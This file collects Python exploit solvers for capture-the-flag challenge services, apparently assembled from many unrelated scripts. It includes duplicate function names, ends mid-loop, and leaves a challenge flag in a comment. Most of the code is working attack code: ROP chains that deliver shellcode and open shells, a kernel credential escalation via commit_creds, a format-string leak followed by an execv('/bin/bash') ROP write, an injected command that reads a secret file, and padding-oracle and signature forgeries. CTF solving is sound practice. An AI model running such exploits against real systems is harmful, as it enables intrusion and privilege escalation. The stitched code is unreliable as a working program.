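def alberry(ctx):
    """Solver for the 'alberry' service: send the staged payload, then hand the session to the user.

    Args:
        ctx: run context (unused here; kept for the common solver signature).
    """
    with Connection('10.210.17.68', 12345) as conn:
        raw_buf = 0x9A89c
        # Second stage is read from disk; close the handle instead of leaking it.
        with open('./res.bin', 'rb') as f:
            shellcode = f.read()
        gets_addr = 0x019EAc
        pop_r0_r4_pc = 0x000294bc
        pop_pc = 0x00059978
        payload = struct.pack('<I', pop_pc) * 10
        payload += struct.pack('<III', pop_r0_r4_pc, raw_buf, 0)
        payload += struct.pack('<IIIII', gets_addr, 0, 0, 0, 0)
        payload += struct.pack('<I', raw_buf)
        # NOTE(review): the original asserts that neither buffer contains b'\n' were
        # commented out; each send below is newline-terminated, so a stray newline
        # inside either buffer would split the message.
        #assert payload.find(b'\n') == -1
        #assert shellcode.find(b'\n') == -1
        conn.send(payload + b'\n')
        conn.send(shellcode + b'\n')
        conn.send('ls\n')
        conn.interactive()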
def go(ctx):
    """Drive the 100-round patching game: dump each round's binary, solve it, send the patches.

    Args:
        ctx: run context providing ``rundir`` and ``runid`` for the per-round dump files.
    """
    with Connection('abc.eatpwnnosleep.com', 55555, logfile='./conn.log') as conn:
        for round_no in range(100):
            print('ON ITER ', round_no)
            conn.logfile_obj.flush()
            matcher = cmisc.TwoPatternMatcher(f'[*] TRY {round_no+1}/100', '[!] Fail!')
            conn.recv_until(matcher)
            if matcher.b_check:
                # The failure pattern matched: the previous round's patches were rejected.
                print('FAIL on ', round_no - 1)
                return
            banner = conn.recv_until('[?]').decode()
            print(banner)
            # Keep the non-empty lines that are not '[..]' status lines.
            body = [ln for ln in banner.splitlines() if ln and not ln.startswith('[')]
            fname = f'{ctx.rundir}/f_{ctx.runid}_{round_no}.bin'
            with open(fname, 'wb') as out:
                out.write(base64.b64decode(get_uniq(body)))
            conn.send(fmt_patches(solve(fname)))
            print(conn.recv_timeout(2))
class Solver(ExitStack):
    """Client for the XOR/ADD oracle service, usable as a context manager."""

    def __init__(self):
        super().__init__()
        self.conn = Connection('arcade.fluxfingers.net', 1821)

    def __enter__(self):
        super().__enter__()
        self.enter_context(self.conn)
        # Consume the greeting up to the oracle menu.
        self.conn.recv_until('Possible Oracles')
        return self

    def get_ans(self):
        """Read one oracle reply and return the base64-decoded ciphertext."""
        reply = self.conn.recv_until('Possible Oracles').decode()
        hit = re.search('Ciphertext is (.+)', reply)
        return base64.b64decode(hit.group(1))

    def _query(self, op, a):
        # Both oracles take the operand as lowercase hex on its own line.
        self.conn.send(f'{op}\n{a:x}\n')
        return self.get_ans()

    def do_xor(self, a):
        """Ask the XOR oracle about operand ``a``."""
        return self._query('XOR', a)

    def do_add(self, a):
        """Ask the ADD oracle about operand ``a``."""
        return self._query('ADD', a)
def client(ctx):
    """Send a fixed sequence of ratchet-wrapped messages and print each decoded reply."""
    ratchet = get_ratchet(ctx)
    probes = ('jambon', REQ_FLAG, 'kappa', 'abc')
    with Connection(ctx.host, ctx.port) as conn:
        for msg in probes:
            conn.send(ratchet.prepare_send_message(msg) + b'\x00')
            # Frames are NUL-terminated; drop the terminator before unwrapping.
            reply = conn.recv_until(b'\x00')[:-1]
            print('Received response to ', msg, 'is', ratchet.on_recv_message(reply))
def client(ctx):
    """Send 300 randomly chosen plaintexts through the ratchet and print the decoded replies."""
    ratchet = get_ratchet(ctx)
    choices = ('jambon', 'kappa', 'abc', 'a', 'b', 'c', 'd')
    with Connection(ctx.host, ctx.port) as conn:
        for _ in range(300):
            msg = random.choice(choices)
            conn.send(ratchet.prepare_send_message(msg) + b'\x00')
            # Frames are NUL-terminated; drop the terminator before unwrapping.
            reply = conn.recv_until(b'\x00')[:-1]
            print('Received response to ', msg, 'is', ratchet.on_recv_message(reply))
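def test(ctx):
    """Send one padded JSON record to the service, then hand the session to the user.

    The original also carried a 200-iteration submission loop under ``if 0:``; it
    was dead code and has been dropped.
    """
    with Connection('arcade.fluxfingers.net', 1822) as conn:
        record = dict(
            x=167579391684973268008976899398162142,
            y=112257816371615265563133215310271332,
            c=0xdeaf,
            d=0xbeff,
            groupID='jambon',
        )
        # send_padded pads the JSON line to 8192 bytes (presumably a fixed-size
        # read on the server side — confirm against the service).
        conn.send_padded(json.dumps(record) + '\n', 8192)
        conn.interactive()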
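def test(ctx):
    """Send the prepared shellcode file to the service after the address/breakpoint prompts."""
    with open('./shellcode.out', 'rb') as f:
        shellcode = f.read()
    # Checked before connecting so a wrong-sized file does not leave a half-driven session.
    assert len(shellcode) == 0x2e
    with Connection('arcade.fluxfingers.net', 1807) as conn:
        addr = 0xbb + 1
        bp = 3
        conn.send(f'{addr:x}\n')
        conn.send(f'{bp:x}\n')
        conn.recv_until('Enter the Key')
        conn.send(shellcode)
        conn.interactive()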
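def test(ctx):
    """Explore the remote grid by depth-first search, one move per round trip."""
    with Connection('finale-docker.rtfm.re', 10000) as conn:
        data = conn.recv_until('Your actual')
        m = re.search(r'width : ([0-9]+) - height : ([0-9]+)', data.decode())
        width = int(m.group(1))
        height = int(m.group(2))
        print(width, height)
        res = conn.recv_until('>')
        m = re.search(r'x : ([0-9]+) - y : ([0-9]+)', res.decode())
        x = int(m.group(1))
        y = int(m.group(2))
        # Cell state: -1 = unexplored, 0 = walkable, 1 = blocked.
        mp = -np.ones((width, height), dtype=int)

        def get_new(action):
            """Send one move and return (accepted, x, y) parsed from the reply."""
            conn.send(action + '\n')
            reply = conn.recv_until(')').decode()
            mm = re.search(r'\(([0-9]+) - ([0-9]+)\)', reply)
            return reply.find('OK -') != -1, int(mm.group(1)), int(mm.group(2))

        vx = [-1, 1, 0, 0]
        vy = [0, 0, 1, -1]
        # Direction i is undone by direction i ^ 1 (W<->E, N<->S).
        vs = 'WENS'
        mp[x, y] = 0
        # Explicit DFS stack: [x, y, next direction to try, direction used to get here].
        q = [[x, y, 0, -1]]
        while q:
            x, y, i, prev = q[-1]
            if i == 4:
                # All four directions tried: backtrack by undoing the incoming move.
                q.pop()
                # NOTE(review): get_new() returns a tuple, so this assert can never
                # fail; the intent is presumably to check the 'accepted' flag.
                assert get_new(vs[prev ^ 1])
                continue
            q[-1][2] += 1
            nx, ny = x + vx[i], y + vy[i]
            # NOTE(review): no bounds check here; a negative index wraps around in numpy.
            if mp[nx, ny] != -1:
                continue
            ok, ex, ey = get_new(vs[i])
            if ok:
                print(ex, ey)
                assert ex == nx and ey == ny
                mp[nx, ny] = 0
                q.append([nx, ny, 0, i])
            else:
                mp[nx, ny] = 1
        go(x, y)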
def test(ctx):
    """Call the three fixed addresses through Client (prepare, zero x5, commit), then go interactive."""
    print('on test')
    prepare_creds = 0xffffffff8104ed20
    commit_creds = 0xffffffff8104e9d0
    zero_gadget = 0xffffffff81000000 + 0x00000000000dd773
    print(prepare_creds)
    print(commit_creds)
    print(hex(zero_gadget))
    data = 0xffff88000212d240  # kept from the original; not used below
    print(zero_gadget)
    with Connection('arcade.fluxfingers.net', 1817) as conn:
        client = Client(conn)
        credaddr = client.call(prepare_creds, 0)
        for step in range(5):
            client.call(zero_gadget, credaddr + 0x14 + step * 8)
        client.call(commit_creds, credaddr)
        conn.interactive()
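def go():
    """Build a forged command from the signed one stored in FIL and send it to the local service."""
    with open(FIL, 'r') as f:
        tag, cmd = f.read().rstrip().split(':')
    cmd = binascii.a2b_base64(cmd)
    blocks = [cmd[x:x + 16] for x in range(0, len(cmd), 16)]
    print(blocks)
    prefix = 'self.request.send(open("./secret", "r").read()+"\\n<<EOF")\n'
    # Pad the prefix to a whole 16-byte block.
    prefix += '\n' * (16 - len(prefix) % 16)
    prefix = prefix.encode()
    forged_cmd = prefix + prefix + cmd
    data = tag.encode() + b':' + binascii.b2a_base64(forged_cmd)
    with Connection('localhost', 4324) as conn:
        conn.send(data)
        time.sleep(1)
        # NOTE(review): bytes.find() returns -1 (truthy) when the marker is absent
        # and 0 (falsy) when it starts the buffer; confirm that recv_until treats
        # a callable predicate this way.
        print(conn.recv_until(lambda x: x.find(b"<<EOF")))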
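def test(ctx):
    """Query the keystream oracle for every position and pickle the answers to flags.data_file.

    The original carried an experiment under ``if 0:`` (a local rasta_standard
    evaluation); it was dead code and has been dropped.
    """
    with Connection('arcade.fluxfingers.net', 1820) as conn:
        solver = Solver(conn)
        answers = [solver.query_last(i) for i in range(keystream.n)]
        dump = cmisc.Attributize()
        dump.reslist = answers
        dump.chall = solver.chall
        # Use a context manager so the pickle is flushed and the handle closed.
        with open(flags.data_file, 'wb') as out:
            pickle.dump(dump, out)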
def test(ctx):
    """Train a classifier on 1500 streamed profiles, then answer 500 more over the same connection."""
    print('on test')
    with Connection('finale-docker.rtfm.re', 6969) as conn:

        def recv_profile():
            """Read one blank-line-terminated profile and return its numeric fields."""
            content = conn.recv_until('\n\n').decode()
            fields = []
            for line in content.split('\n'):
                sep = line.find(': ')
                if sep == -1:
                    continue
                value = line[sep + 2:]
                # 'oui'/'non' map to 1/0; anything else is parsed as a float.
                if value == 'oui':
                    fields.append(1)
                elif value == 'non':
                    fields.append(0)
                else:
                    fields.append(float(value))
            return fields

        train = np.array([recv_profile() for _ in range(1500)])
        # Last column is the label, the rest are features.
        train_y = train[:, -1]
        train_x = train[:, :-1]
        print(train_y)
        clf = GradientBoostingClassifier(
            n_estimators=100, learning_rate=1.0, max_depth=2, random_state=0
        ).fit(train_x, train_y)
        #sigsegv{I_L0v3_Tent4cl3s}
        for _ in range(500):
            sample = np.array(recv_profile())[None, :]
            verdict = clf.predict(sample)
            # 'NO' indexed by the predicted class: 0 -> 'N', 1 -> 'O'.
            conn.send('NO'[int(verdict[0])] + '\n')
        conn.interactive()
def test2():
    """Recover the server key with Solver, restarting the whole session on any failure."""
    n = 128
    key = [random.randint(0, 2 * n - 1) for _ in range(n)]
    analyse(key)
    server = 'wob-key-e1g2l93c.9447.plumbing'
    port = 9447
    while True:
        try:
            with Connection(server, port) as conn:
                # `pow` here is a module-level helper (shadows the builtin) — presumably
                # the service's proof-of-work step; confirm against its definition.
                pow(conn)
                oracle = ServerOracle(conn)
                key = Solver(oracle, n).go()
                oracle.chall(TrueOracle(key))
                break
        except Exception as e:
            # Any error (network or solver) is logged and the loop retries from scratch.
            print('failed', e)
            tb.print_exc()
def main():
    """Entry point: currently just runs patch() and returns.

    Everything after the early ``return`` below is unreachable as written: a
    binary search over n-character alnum strings driven by the service's
    ``error code`` replies. It is kept verbatim as the author left it.
    """
    if 1:
        patch()
        return
    print(host, port)
    with Connection(host, port) as s:
        cnds = []
        n = 8
        nx = len(alnum_list)
        # Search space is every n-character string over alnum_list, treated as a base-nx number.
        T = 0
        H = (len(alnum_list)**n) - 1
        while T <= H:
            M = (T + H) // 2
            s.send('admin\n')
            # Encode M as an n-digit base-nx string (most significant digit first).
            buf = b''
            v = M
            for i in range(n):
                buf += alnum_list[v % nx]
                v //= nx
            buf = buf[::-1]
            s.send(buf + b'\n')
            print('on iter ', T, H, buf)
            res = s.recv_until(PatternMatcher.fromre(b'error code=(1|-1)|Successfully'))
            if res.find(b'Successfully') != -1:
                print('found for ', buf)
                T = M
                break
            else:
                print(res)
                m = re.search(b'error code=(1|-1)', res)
                assert m
                # error code 1 means "too low", -1 "too high" — presumably; inferred from the search direction.
                if int(m.group(1)) == 1:
                    T = M + 1
                else:
                    H = M - 1
def doit():
    """Locate the DEBUG room with the initial token, then build and submit an admin token via PaddingOracle."""
    with Connection('localhost', 4445) as conn:
        token, roomnum = step1(conn)
        conn.recv_until('AND YOUR TOKEN')

        def query(rn, data):
            """Send ``data`` (base64) for room ``rn``; return (access granted?, raw reply)."""
            tt = base64.b64encode(data).decode()
            tmp = conn.send_and_expect(f'{rn}|{tt}\n', 'AND YOUR TOKEN')
            return tmp.find(b'ACCESS GRANTED') != -1, tmp

        tbin0 = bytearray(base64.b64decode(token))
        debug_room = None
        for rn in roomnum:
            print('QUERY ROOM ', rn)
            _, res = query(rn, tbin0)
            if res.find(b'WELCOME TO ROOM "DEBUG"') != -1:
                debug_room = rn
                break
        # NOTE(review): debug_room stays None if no room matched; q_padding would then query room None.
        print('DEBUG ROMO ">> ', debug_room)

        def q_padding(data):
            """Padding predicate for PaddingOracle: True unless the reply reports invalid padding."""
            _, tmp = query(debug_room, data)
            return tmp.find(b'Invalid padding') == -1

        oracle = PaddingOracle(q_padding)
        print(len(tbin0))
        #res = oracle.recover_msg(tbin0)
        # With recover_msg commented out, `res` here is still the reply from the last room query above.
        print(res)
        admin_token = b'{"guid": "dc5928bd15b87de8b3335f67e6712444", "level": "ADMIN"}'
        enc_token = oracle.encode(admin_token)
        print(query(roomnum[0], enc_token))
        return
def test1():
    """Sign a throwaway command with test_sign() and push it to the local service."""
    signed = test_sign("print 'bonjour'; kappa jmabon\n")
    with Connection('localhost', 4324) as conn:
        conn.send(signed)
def hack_client(ctx):
    """Derive a signature for a new REQ_FLAG message from the published b2a messages and send it.

    Reads bob.key/alice.key and the b2a message files, cross-checks them against
    the local key from local_sig(ctx), dumps an intermediate matrix to ./mat.data,
    reads the transform back from ./tsf.data, and finally submits the forged
    message over ctx.host:ctx.port.
    """
    # NOTE(review): these open() calls are never closed (no context manager).
    local_pk = load(open(f'./public-data/bob.key', 'rb'))
    remote_pk = load(open(f'./public-data/alice.key', 'rb'))
    lsig = SignatureScheme(None, local_pk)
    rsig = SignatureScheme(None, remote_pk)
    ratchet = make_ratchet(lsig, rsig)
    import glob
    msgs = glob.glob('./public-data/messages/b2a*')
    msgs.sort()
    data = {}
    tb = []
    hl = 256
    for msg_id, msg_fname in enumerate(msgs):
        content = open(msg_fname, 'rb').read()
        # Message files are '<signed_data>|<signature>'; split on the last '|'.
        signed_data, signature = content.rsplit(b"|", 1)
        h = lsig.hash2(signed_data, msg_id + 1)
        data[msg_id + 1] = [h, signed_data, protocol.decode_int(signature)]
        tb.append([np.array(h, dtype='object'), protocol.decode_int(signature)])
        #signature_valid = lsig.verify(data, protocol.decode_int(signature))
        #assert signature_valid
    N = local_pk.n
    fk = local_sig(ctx)
    last_sig = tb[-1][1]

    def inv(x):
        """Modular inverse of x mod N, sanity-checked."""
        ix = gmpy2.invert(x, N)
        assert x * ix % N == 1
        return ix

    # Replace each signature by its ratio to the previous one (walking backwards).
    for i in range(1, len(tb)):
        tb[-i][1] = tb[-i][1] * inv(tb[-i - 1][1]) % N
    # Consistency check of the ratios against the local secret key.
    for i, (h, x) in enumerate(tb):
        v = fk.sk.r
        for j in range(hl):
            if h[j] == 1:
                v = v * fk.sk.s[j] % N
        v = pow(v, 2**i, N)
        assert v == x, i
    mat = []
    last = tb[-1]
    tb = tb[:-1]
    n = len(tb)
    tmp = []
    hlist = []
    for i in range(n):
        x = inv(pow(tb[i][1], 2**(n - i), N)) * last[1] % N
        hdiff = last[0] - tb[i][0]
        tmp.append([x, hdiff])
        hlist.append(list(hdiff))
        #print(list(hdiff)) for dumping to sage
    # NOTE(review): file handle not closed; written for the external (sage) step.
    json.dump(hlist, open('./mat.data', 'w'))
    if 0:
        return
    # Transform computed offline is read back here (./tsf.data must already exist).
    data = Attributize(json.load(open('./tsf.data', 'r')))
    print(data.base)
    slast = 1
    for i, (u, v) in enumerate(data.make_unimodular):
        slast = gmpy2.powmod(slast, u, N) * gmpy2.powmod(tmp[data.base[i]][0], v, N) % N
    scoeffs = [1] * hl
    scoeffs[0] = slast
    for i in range(1, hl):
        scoeffs[i] = tmp[data.mat_id[i - 1]][0]
    if 0:
        # Disabled self-check of tmp against the local secret key.
        for have, hdiff in tmp:
            x = 1
            for j, v in enumerate(hdiff):
                x = x * gmpy2.powmod(fk.sk.s[j], (2**(n)) * v, N) % N
            assert x == have
    sexpr = [0] * hl
    if 1:
        # Recombine via data.imat; each row is asserted against the local key as a check.
        for i in range(hl):
            print('processing ', i)
            cur = 1
            for j in range(hl):
                cur = cur * gmpy2.powmod(scoeffs[j], data.imat[i][j], N) % N
            sexpr[i] = cur
            assert cur == (gmpy2.powmod(fk.sk.s[i], 2**n, N))
    else:
        for i in range(hl):
            sexpr[i] = pow(fk.sk.s[i], 2**(n), N)
    # The first assignment to r is immediately overwritten by the next line.
    r = pow(fk.sk.r, 2**(n), N)
    r = last[1]
    for i in range(hl):
        if last[0][i]:
            r = r * inv(sexpr[i]) % N
    ratchet.remote_public_element = 1
    public_element, iv, ciphertext = ratchet._encrypt_message(REQ_FLAG)
    public_element = 1
    signed_data = protocol.encode_int(public_element, 256) + b"|" + protocol.encode_int(iv, 16) + b"|" + protocol.encode_bytes(ciphertext)
    nmsg_id = n + 2
    nh = lsig.hash2(signed_data, nmsg_id)
    print(nh)
    forged_sig = r
    for i, v in enumerate(nh):
        if v:
            forged_sig = forged_sig * sexpr[i]
    forged_sig = forged_sig * forged_sig * last_sig % N
    data = signed_data + b"|" + protocol.encode_int(forged_sig, 256)
    with Connection(ctx.host, ctx.port) as conn:
        conn.send(data + b'\x00')
        res = conn.recv_until(b'\x00')[:-1]
        ratchet.public_element = 1
        flagans = ratchet.on_recv_message(res, hack=True)
        print(flagans)
def run():
    """Connect to the local service, spawn the query oracle process, and let Server drive both."""
    # Fixed command string (no user input), so shell=True is acceptable here.
    oracle_cmd = './build/gitzino/distribute/gitzino_solve query'
    with Connection('localhost', 17171) as conn, Process(oracle_cmd, shell=True) as oracle:
        Server(conn, oracle).solve()
def solve():
    """Solver for the 'ebp' service.

    Leaks 60 values from the service, derives addresses from them, writes a
    RopBuilder buffer through write_ctrl_addr/write_addr, then drops into an
    interactive console. Returns False early if the leaked value at index 12
    fails the range check, True otherwise.
    """
    # Toggle between the remote service and a local ./ebp process.
    remote = 1
    if remote:
        conn = Connection('52.6.64.173', 4545)
    else:
        conn = Process('./ebp')
    with conn as x:
        # Request 60 'index:%08x' fields followed by an END marker.
        data = ''
        for i in range(60):
            data += '{}:%08x '.format(i + 1)
        data += '-1END\n'
        x.send(data.encode())
        res = x.recv_until(PatternMatcher.frombytes(b'END\n'))
        res = res.decode()
        # Comprehension-scoped `x` here does not clobber the connection `x` outside it.
        tb = [x.split(':') for x in res.split(' ')]
        tb.pop()
        tb = {int(x[0]): int(x[1], 16) for x in tb}
        print(res)
        global id_base_addr
        id_base_addr = tb[4] - 0x18 - 0xc - 3 * 4
        g_int80 = 0xf761fa63 - 0xf7584979 + tb[44]
        mk = tb[12] & 0xffff
        # Range check on the low 16 bits of leak #12; bail out (and let the caller retry) otherwise.
        if not mk < 0x300:
            return False
        expected_exit_off = 0xf7621150 - 0xf7619979 + tb[44]
        print('cxa should be at >> ', hex(expected_exit_off))
        y = X86Machine(0)
        print(hex(tb[44]))
        #disp_ins(x, y,tb[44]-libc_id_off, 20)
        if 0:
            # Disabled: drop into a console right after the leak.
            c = code.InteractiveConsole(locals=dict(locals(), **globals()))
            c.interact()
            return
        if 0:
            # Disabled: interactive read loop for manual inspection.
            while True:
                try:
                    data = input('next addr? ')
                    data = data.split(' ')
                    addr = int(data[0], 16)
                    n = int(data[1])
                    res = do_read(x, addr, n)
                    print(res)
                    #disp_ins(x, y, addr, n)
                except KeyboardInterrupt:
                    raise
                except Exception as e:
                    # print() of print_exc()'s None return; harmless but odd.
                    print(traceback.print_exc())
                    pass
        libc_start = tb[44] - 9
        if remote:
            execv_off = 0x9b100
        else:
            execv_off = 0x000b3140 - 0x00018570
        g_execv = libc_start + execv_off
        g_pop3 = 0x80485dd
        need_write = (tb[12] - 0x20) & 0xffff
        target = tb[12] & ~0xffff
        target_start = 0x340
        target += target_start
        g_pop1 = 0x8048385
        rop = RopBuilder(target, 4)
        rop.add('I', tb[12])
        rop.add('II{I:_ref_path}{I:_ref_argv}{I:_ref_env}', g_execv, 0)
        rop.add('{#argv}{I:_ref_path}{#env}I', 0)
        rop.add('{#path}{"/bin/bash}?', 0)
        buf = rop.get()
        print(buf)
        # One control-address + data write per byte of the buffer.
        for i in range(len(buf)):
            write_ctrl_addr(x, target + i)
            write_addr(x, buf[i])
        write_ctrl_addr(x, tb[4] - 0x20)
        disp(x)
        input('final write')
        write_addr(x, target_start, buf, 0)
        c = code.InteractiveConsole(locals=dict(locals(), **globals()))
        c.interact()
        time.sleep(1)
        res = x.recv(1024)
        print(res)
        res = x.recv(1024)
        print(res)
        res = x.recv(1024)
        print(res)
        res = x.recv(1024)
        print(res)
        input('finish')
    return True
def hack_client(ctx):
    """Derive a signature for a new REQ_FLAG message from the published b2a messages and send it.

    Variant of the matrix-based approach: picks two message deltas with coprime
    hash differences and combines them with the extended gcd. Reads
    bob.key/alice.key and the b2a message files, then submits the forged
    message over ctx.host:ctx.port.
    """
    # NOTE(review): these open() calls are never closed (no context manager).
    local_pk = load(open(f'./public-data/bob.key', 'rb'))
    remote_pk = load(open(f'./public-data/alice.key', 'rb'))
    lsig = SignatureScheme(None, local_pk)
    rsig = SignatureScheme(None, remote_pk)
    r = make_ratchet(lsig, rsig)
    import glob
    msgs = glob.glob('./public-data/messages/b2a*')
    msgs.sort()
    data = {}
    tb = []
    for msg_id, msg_fname in enumerate(msgs):
        content = open(msg_fname, 'rb').read()
        # Message files are '<signed_data>|<signature>'; split on the last '|'.
        signed_data, signature = content.rsplit(b"|", 1)
        h = lsig.hash2(signed_data, msg_id + 1)
        data[msg_id + 1] = [h, signed_data, protocol.decode_int(signature)]
        tb.append([h, protocol.decode_int(signature)])
        print(tb[-1])
        print()
        #signature_valid = lsig.verify(data, protocol.decode_int(signature))
        #assert signature_valid
    N = local_pk.n
    hl = 256
    fk = local_sig(ctx)
    last_sig = tb[-1][1]

    def inv(x):
        """Modular inverse of x mod N, sanity-checked."""
        ix = gmpy2.invert(x, N)
        assert x * ix % N == 1
        return ix

    # Replace each signature by its ratio to the previous one (walking backwards).
    for i in range(1, len(tb)):
        tb[-i][1] = tb[-i][1] * inv(tb[-i - 1][1]) % N
    last = tb[-1]
    tb = tb[:-1]
    n = len(tb)
    tmp = []
    for i in range(n):
        x = inv(pow(tb[i][1], 2**(hl * (n - i)), N)) * last[1] % N
        hdiff = last[0] - tb[i][0]
        tmp.append([x, hdiff])
    # Pick the last delta and the first one whose hash difference is coprime to it.
    sel1 = tmp[-1]
    sel2 = None
    for cnd in tmp:
        if gmpy2.gcd(tmp[-1][1], cnd[1]) == 1:
            sel2 = cnd
            break
    else:
        assert 0
    d, u, v = gmpy2.gcdext(sel1[1], sel2[1])
    # Negative Bezout coefficients are folded into the base by inverting it.
    if u < 0:
        sel1[0] = inv(sel1[0])
        u = -u
    if v < 0:
        sel2[0] = inv(sel2[0])
        v = -v
    spw = pow(sel1[0], u, N) * pow(sel2[0], v, N) % N
    # `expected` is computed but not used below.
    expected = pow(fk.sk.s, 2**(hl * n), N)
    rpw = last[1] * gmpy2.powmod(spw, -last[0], N) % N
    r.remote_public_element = 1
    public_element, iv, ciphertext = r._encrypt_message(REQ_FLAG)
    public_element = 1
    signed_data = protocol.encode_int(public_element, 256) + b"|" + protocol.encode_int(iv, 16) + b"|" + protocol.encode_bytes(ciphertext)
    nmsg_id = n + 2
    nh = lsig.hash2(signed_data, nmsg_id)
    print(nh, nmsg_id, signed_data)
    forged_sig = last_sig * pow(rpw * pow(spw, nh, N), 2**hl, N) % N
    print(forged_sig)
    data = signed_data + b"|" + protocol.encode_int(forged_sig, 256)
    with Connection(ctx.host, ctx.port) as conn:
        conn.send(data + b'\x00')
        res = conn.recv_until(b'\x00')[:-1]
        r.public_element = 1
        flagans = r.on_recv_message(res, hack=True)
        print(flagans)
def __init__(self):
    """Initialise the base class and create the service connection."""
    super().__init__()
    host, port = 'arcade.fluxfingers.net', 1821
    self.conn = Connection(host, port)
#!/usr/bin/env python
import sys

from chdrft.tube.connection import Connection

# Probe: a short C source, 256 filler bytes, a newline and an end-of-text byte.
data = b''' int main() { write(1, "hi", 2); } '''
data += b'a' * 256 + b'\n' + b'\x03'

with Connection(
    'crippled_f7fddee5e137122934909141e7d3f728.quals.shallweplayaga.me', 11111) as c:
    c.send(data)
    # Print up to three reply chunks.
    for _ in range(3):
        print(c.recv(1024))
def main():
    """Connect, pull the challenge data, and hand it to solve()."""
    with Connection('school.fluxfingers.net', 1513) as conn:
        parts = get_data(conn)
        print(parts)
        solve(conn, *parts)
def main():
    """Play the betting service with a local oracle process.

    Generates a DSA key, ships its parameters encrypted with server_pub_enc,
    then loops: read the balance, bet everything at odds ``odd_max``, send the
    padded commitment ``sig``, pick the RSA key matching the server's RNG
    value from ``db`` and send it. ``sys.argv[1]`` is the oracle binary.
    """
    dsa = DSA.generate(512)
    data = [dsa.key.y, dsa.key.g, dsa.key.p, dsa.key.q]
    data_str = ','.join(map(str, data))
    chunk_size = 64
    chunks = []
    # Encrypt the parameter string in 64-character chunks, hex-encoded, comma-joined.
    for i in range((len(data_str) + chunk_size - 1) // chunk_size):
        tmp = data_str[64 * i:64 * i + 64].encode()
        chunks.append(binascii.b2a_hex(server_pub_enc.encrypt2(tmp)[0]))
    enc_key = b','.join(chunks)
    # Only the last assignment to n is used; the first four are overwritten.
    n = 0x345080e693fa74f29d5ccac2f13556bea2541231949e14d7cd86068e5adcbc3d5622936f770fab224beea0da967057fdd9cd8419561c77445fa8b358720afc9f3703acc4b3b6901140587d83477fd271d3499797f9582bb1a5c985804ff905055cc4efecedd70cacc219ca3ba49537d6268ab66aa1c639c1963e089f3a63aac9b8b
    n = 0x167c731ae38435961bd5322b2b0ec685027147d194b8096fc2bcadacbece96d29b11c93dff0417644387aaca8cbdaa3bc895fd787c8fed999c19efcda1b0603b79370e675fc3a7e5536c8b07566b845a2fb513735d7ddb5051d04fe129eae00f17896ca892087388249b4e68acf46ed6938338a03b3a542b2c20f861cbc86eab10751
    n = 0x3ada6f51c3e3009b4b63bb14b710624f321248b12741559e29a487eaaa05167dfd9f712e1825769ba612595b81945e0def05c379cc11a4419a3bfa00f14c6ca43ec21306955fc16621025898b59219cc1c4e0474719dbc715f9c31344c9af39a3d954fedc39651f244ee2c333fe257125a97d4db45135b53eb2383714f302bcf6b6
    n = 0x29b32eb59e7ee1c467e1cc952af0d531d9d3128fbd6aecab8394fddc016e7786267b212bdaf6d343fef51a7a8ebec644c65d040f70b99e5a5c570024328431d17800ecd478bcb6fb92c0dfd76fd7cea637d9317c1cdd90b9b30f548daa7e39fb5a9d289246e4b90ec665e797bc76587d4d19e2edb2e6269621910f83b17726240de12c18e69a
    n = 0xc56f3ad5b3eca2ea9920c4fb01a84bf6538e2a5dd9f776a9fa1b22590a8609bb4a03ed13c7c07aa82d792c5676c8296381518838b03444079604b88b1d5048d2da88c036201c1599da302532b94a0ba9902750748d491bbfb1c0da674b6cbba0c1fb6bb693080eabdd0c7096757c8b80fe8ca6d82cb1bc5151a30fa40f9ea982675b1
    # NOTE(review): public exponent 12 is even; confirm RSA.construct / encrypt2 accept this deliberately.
    k = RSA.construct((n, 12))
    x = PKCS1_OAEP.new(k)
    assert len(sys.argv) > 1
    with Connection(remote, remote_port) as conn, Process(sys.argv[1]) as proc:
        print('ENCRYPT MOFO')
        # Probe encryption once to learn the signature length; bare except only logs and re-raises.
        try:
            len_sig = len(x.encrypt2(b'kfwefappa')[1])
        except:
            print('EJSUS FAIL')
            raise
        print('ENCRYPT MOFO')
        sent_sig = 'YOU KAPPA F**K'
        # Left-pad the marker with NULs to the full signature length.
        prefix = '\x00' * (len_sig - len(sent_sig))
        sig = prefix + sent_sig
        sig = sig.encode()
        db = []
        y = Oracle(proc)
        y.send_num(hex(n)[2:].encode())
        odd_max = 2
        if 0:
            # Disabled: search for db entries through the oracle, one per odds value.
            for i in range(0, odd_max):
                s = get_guess_for(i)
                print('ON STEP >> ', i)
                nbit = 10
                for A in range(2**nbit):
                    # Vary the suffix over 2**nbit space/newline patterns.
                    s2 = ''
                    for j in range(nbit):
                        if A >> j & 1:
                            s2 += ' '
                        else:
                            s2 += '\n'
                    s2 = s + s2
                    gen = x.encrypt2(s2.encode())[1]
                    print(gen)
                    print(hex(n))
                    work = gen
                    res = y.get(sig, work)
                    if res:
                        db.append(res)
                        break
                else:
                    assert False
        else:
            # Precomputed db entries (results of the disabled search above).
            db.append([
                b'a0fbbacc479a8a3af09aebdbb9ae30834a10699d9d618108514d88f308161577809ae60e182c75e0f95797806179363a4c17da900373a3879ac3a692dc5f8f8b1e022eee294dd7013858394fa2f366179f64c9ab0ff28c89b3a78b1a6b6a8852de7a3f5de4dbe6ae0667941e8283f4c3eaa22572cc4dd4dceef54251bd3cf4690d301',
                b'2a1fed419b80c8145524c84c9c1f2efdf598d18da0eecfd2892a8956358827e613cf05c505e9b902277727c889a7ff32ea0b4bbe018fc8acc33743cfa14d31597a0e879135edc1257c8815208817dc7f6ed470c4e75742890ec7f7604c7025afa4f0f6193e3df2925320553ea1c9be3982369dd2b35b2b858fc7ea029e132693e355'
            ])
            db.append([
                b'42de041b5d51a89aa133a02dcb108a0714344d6cd0e23cee44d0e64a7c03fcd7163a8195f106ab8664215d9d13efa63871189ddbf25a7aedb1803c6ae5d8c75bd3aa78ac934f68ff1b55d4984bd66b8e79d1b490d553f1f0b3d93c04101e78603e94e5577f6525f934bef8016497820831e9e6a4571e446334a98e1b9d99f015a1735',
                b'70f611574824ae1ca492657f842feb2fea44283f7e7cc1da42997df2a54402975a490b9ca3990c95536c93c317976d7db1c844575b5f3f12bd9cc4f83808f31635749dd58da1b4cb392b08131766472895db3beb16f5317f4477a0df71f84c22de477066ce0bc4468df5a68e2527390c561c8c177b823f824b6926acf17599447f509'
            ])
        print('sending')
        conn.trash(1)
        conn.send(enc_key)
        while True:
            time.sleep(0.5)
            # NOTE(review): `\$` and `\)` in a bytes literal are not valid escapes; the
            # backslashes survive, which is what the regex needs, but a raw rb'' literal would be clearer.
            pattern = b'You have \$([0-9]+)\)\n'
            res = conn.recv_until(PatternMatcher.fromre(pattern))
            monies = int(re.search(pattern, res).group(1))
